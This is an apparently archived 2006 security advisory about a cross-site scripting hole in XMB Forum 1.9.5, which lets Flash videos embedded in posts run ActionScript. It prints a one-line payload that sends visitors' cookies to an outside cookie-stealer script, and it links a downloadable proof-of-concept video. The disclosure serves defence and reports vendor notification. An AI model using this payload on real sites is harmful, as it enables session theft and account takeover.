Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12149
HistoryApr 10, 2006 - 12:00 a.m.

XMB Forum 1.9.5-Final XSS

2006-04-1000:00:00
vulners.com
7
JSON

XMB Forum 1.9.5 (I have not tested this on earlier versions)
allows users to embed flash (.swf) videos in their posts.
Normally, you could set an option on the <object> tag to say that ActionScript cannot run, but in this case we don't.

The way we execute our code is by making a flash movie containing the Actionscript code:
getURL("javascript:document.location='http://my-site.com/path/to/cookiestealer.php?cookie=&#39;+document.cookie;&quot;&#41;;

An example video + .fla script can be downloaded at my site: http://dynxss.whiteacid.org/videos/xmbforum_1.9.5-final.rar

XMB has been notified, expect this to be fixed in a few days.

comments, questions, flames, etc.
r0xes [dot] ratm [at] gmail [dot] com

JSON